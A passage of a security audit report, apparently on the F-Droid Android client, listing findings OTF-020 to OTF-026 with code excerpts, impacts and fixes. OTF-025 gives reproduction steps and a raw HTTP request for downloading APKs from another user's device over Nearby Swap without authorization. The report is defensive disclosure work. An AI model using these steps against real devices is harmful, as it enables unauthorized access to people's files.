<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.20</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-020 — Unverified URI redirect</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-020</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>URI redirect</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">App Uses Data From Clipboard for external resource link.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file ManageReposActivity.java, when AddRepo action is selected, the public method onOptionsItemSelected() at line 148 calls showAddRepo(), which appears to load an <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://</span><> url from clipboard if the clipboard contents look like a URL.
</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">It may be possible for another application to populate the clipboard with malicious URL.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
157: private void showAddRepo() {
/*
* If there is text in the clipboard, and it looks like a URL, use that.
* Otherwise use "https://" as default repo string.
*/
ClipboardCompat clipboard = ClipboardCompat.create(this);
String text = clipboard.getText();
String fingerprint = null;
String username = null;
String password = null;
if (!TextUtils.isEmpty(text)) {
...
...
189: text = NewRepoConfig.sanitizeRepoUri(uri);
...
...
287: case DOESNT_EXIST:
prepareToCreateNewRepo(url, fp, username, password);
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">This may be leveraged to change the status and fingerprint of an existing repo (line 653-658).</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
Utils.debugLog(TAG, "Enabling existing repo: " + url);
Repo repo = RepoProvider.Helper.findByAddress(context, url);
ContentValues values = new ContentValues(2);
values.put(RepoTable.Cols.IN_USE, 1);
values.put(RepoTable.Cols.FINGERPRINT, fingerprint);
RepoProvider.Helper.update(context, repo, values);
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, I guess this is true. The Add Repo prompt shows the URL it got from the clipboard. I can't think of another way to defend against this.
</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Malicious redirect and interaction with a remote resource can potentially cause complete device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">If this feature is not needed, it should be removed.</div>
</div>
</div>
<a name="f43-file-deleted-unconditionally"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.21</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-021 — File Deleted Unconditionally</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-021</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>File deletion</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The application deletes specified file unconditionally if it exists.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In zipio/ZipOutput.java, output file is unconditionally deleted if it exists.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
58: private void init( File ofile) throws IOException
{
if (ofile.exists()) ofile.delete();
out = new FileOutputStream( ofile);
if (getLogger().isDebugEnabled()) ZipListingHelper.listHeader( getLogger());
}
</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Denial of service or system if a system critical file is deleted.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">On finding that the output file exists, the function should return error and let higher level code handle the error. Alternatively, the code should add a random suffix to the output file name if the specified file exists.</div>
</div>
</div>
<a name="f44-secure-temp-file-usage-recommended"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.22</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-022 — Secure Temp File Usage Recommended</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-022</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure temp file</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd.java uses insecure temp files</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">nanohttpd.java</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd uses java.io.tmpdir system property as the folder to create temp files. It is recommended that secure temp files should only be created within a subfolder of a public, systemwide temp directory.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">576: tmpdir = System.getProperty("java.io.tmpdir");
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">At several places in the code, the temp files in "tmpdir" are created with random string with NanoHTTPD- prefix, making the temp file usage somewhat secure.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">610: file = File.createTempFile("NanoHTTPD-", "", new File(tempdir));
1297: private String saveTmpFile(ByteBuffer b, int offset, int len) {
String path = "";
if (len > 0) {
FileOutputStream fileOutputStream = null;
try {
TempFile tempFile = tempFileManager.createTempFile();
ByteBuffer src = b.duplicate();
fileOutputStream = new FileOutputStream(tempFile.getName());
1318: private RandomAccessFile getTmpBucket() {
try {
TempFile tempFile = tempFileManager.createTempFile();
return new RandomAccessFile(tempFile.getName(), "rw");
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">The tempfile so created is not restricted in its permissions.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Information disclosure, data tampering leading to integrity compromise</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">FILE class in Java allows creation of subdirs, and setting specific permissions on created files. It is recommended to create the temp files within app specific subdirectory, for example "Fdroid" under global tmp folder. This subfolder can be created with restricted permissions for owner only, to create other temporary files with restricted permissions within this app-specific folder.
</div>
</div>
</div>
<a name="f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.23</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-023 — (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-023</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application was found to be signed with a <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 with RSA has known collision issues, hence it is not recommended to be used for signing new apps.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: If you use SHA256, the app will no longer work on Android devices < 4.3. This means that builds made with the new cert system will create APK files that may not install on some Android 4.0-4.2 devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
Version: V3
Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
Key:
Validity: [From: Fri Jul 23 22:40:24 IST 2010,
To: Tue Dec 08 22:40:24 IST 2037]
Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
SerialNumber: [ 4c49cd00]
]
Algorithm: [SHA1withRSA]
Signature:
0000: 08 E4 EF 69 9E 98 07 67 7F F5 67 53 DA 73 EF B2 ...i...g..gS.s..
0010: 39 0D 5A E2 C1 7E 4D B6 91 D5 DF 7A 7B 60 FC 07 9.Z...M....z.`..
0020: 1A E5 09 C5 41 4B E7 D5 DA 74 DF 28 11 E8 3D 36 ....AK...t.(..=6
0030: 68 C4 A0 B1 AB C8 4B 9F A7 D9 6B 4C DF 30 BB A6 h.....K...kL.0..
0040: 85 17 AD 2A 93 E2 33 B0 42 97 2A C0 55 3A 48 01 ...*..3.B.*.U:H.
0050: C9 EB E0 7B F5 7E BE 9A 3B 3D 6D 66 39 65 26 0E ........;=mf9e&.
0060: 50 F3 B8 F4 6D B0 53 17 61 E6 03 40 A2 BD DC 34 [email protected]
0070: 26 09 83 97 FD A5 40 44 A1 7E 52 44 54 9F 98 69 &[email protected]
0080: B4 60 CA 5E 6E 21 6B 6F 6A 2D B0 58 0B 48 0C A2 .`.^n!koj-.X.H..
0090: AF E6 EC 6B 46 EE DA CF A4 AA 45 03 88 09 EC E0 ...kF.....E.....
00A0: C5 97 86 53 D6 C8 5F 67 8E 7F 5A 21 56 D1 BE DD ...S.._g..Z!V...
00B0: 81 17 75 1E 64 A4 B0 DC D1 40 F3 04 0B 02 18 21 ..u.d....@.....!
00C0: A8 D9 3A ED 8D 01 BA 36 DB 6C 82 37 22 11 FE D7 ..:....6.l.7"...
00D0: 14 D9 A3 26 07 03 8C DF D5 65 BD 52 9F FC 63 72 ...&.....e.R..cr
00E0: 12 AA A2 C2 24 EF 22 B6 03 EC CE FB 5B F1 E0 85 ....$.".....[...
00F0: C1 91 D4 B2 4F E7 42 B1 7A B3 F5 5D 4E 6F 05 EF ....O.B.z..]No..
]</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Signing an app with a weaker algorithm makes it easy for attackers to create a fake cert and sign a malicious app.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.</div>
</div>
</div>
<a name="f47--fdroidclient-raw-sql-query-executions"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.24</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-024 — (fdroidclient) Raw SQL Query Executions</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-024</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">App uses and executes raw SQL query. An untrusted user input in raw SQL queries can lead to SQL Injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application uses raw SQL query execution in below files:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\AppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\DBHelper.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\InstalledAppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\LoggingQuery.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\TempApkProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\TempAppProvider.java</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Example of raw SQL query execution:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DBHelper.java</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">sQLiteDatabase.rawQuery("UPDATE fdroid_app SET iconUrl = ( SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version >= ? THEN ? ELSE ? END || fdroid_app.icon) FROM fdroid_apk JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo) WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode ), iconUrlLarge = ( SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version >= ? THEN ? ELSE ? END || fdroid_app.icon) FROM fdroid_apk JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo) WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode)", new String[]{string4, string2, "/icons/", string4, string3, "/icons/"});
DBHelper.clearRepoEtags(sQLiteDatabase);</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Executing raw SQL queries with untrusted user input might lead to SQL injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to never use the unvalidated user input inside a SQL query and execute it. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery() instead opting for a parameterized statement.</div>
</div>
</div>
<a name="f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.25</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-025 — (fdroid Client) Snooping in Between Clients in "Nearby Swap"</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-025</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application's feature Nearby Swap, allows a third person to snoop into the communication. And download files from either of the two user's device, without their permission.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Follow steps below:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56"> </td><td valign="top"><div>Install the app on an Android device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56"> </td><td valign="top"><div>Connect to a wifi network and chose the option Nearby Swap</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56"> </td><td valign="top"><div>Select any app.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56"> </td><td valign="top"><div>Now go to any computer on the same wifi network and scan for all local devices with port 8888. Or just open the URL shown on mobile device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>5. </div></td><td width="7.56"> </td><td valign="top"><div>On the laptop, you will see the fdroid swap default page.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>6. </div></td><td width="7.56"> </td><td valign="top"><div>Now open the URL <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://[mobile device IP]:8888/fdroid/repo/icons/</span>. This page will show the list of applications being shared by this device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>7. </div></td><td width="7.56"> </td><td valign="top"><div>If you want to download an apk shortcut file from this device, just modify the URL as <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://[mobile device IP]:8888/fdroid/repo/[any_icon_name.apk]</span></div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">NOTE: In order to do any of this, you don't need any authorization to be given by the mobile app user.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Request to download any apk</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">GET /fdroid/repo/com.amazon.mShop.android_4810.apk HTTP/1.1
User-Agent: F-Droid 1.0.3
Host: 192.168.57.33:8888
Connection: close
Accept-Encoding: gzip, deflate</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">HTTP/1.1 200 OK
Content-Type: application/vnd.android.package-archive
Date: Tue, 27 Mar 2018 12:36:08 GMT
ETag: bca3baa2
Content-Length: 320880
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 320880
....
[Redacted]
....</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to exploit the Nearby swap feature of fdroid application and access the Android device's application directory. This can also be used to download files from the device, without any authorization.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The way the feature has been implemented is prone to different attacks. It is suggested to not directly open a web server and allow everyone to access. Some authentication should be applied.</div>
</div>
</div>
<a name="f52--fdroid-client-insecure-implementation-of-ssl"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.26</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-026 — (fdroid Client) Insecure Implementation of SSL</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-026</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Transport Layer Security</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Trusting all the certificates or accepting self-signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The application trusts and accepts any SSL certificate and self-signed certificate.
This allows an attacker to capture the application's traffic in a proxy and perform MITM attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The application's code in the file TlsOnlySocketFactory.java shows that the application trusts and accepts any SSL certificate.
It is possible to install an SSL certificate on a device and run the application to capture its traffic on the proxy.</div>
</div>
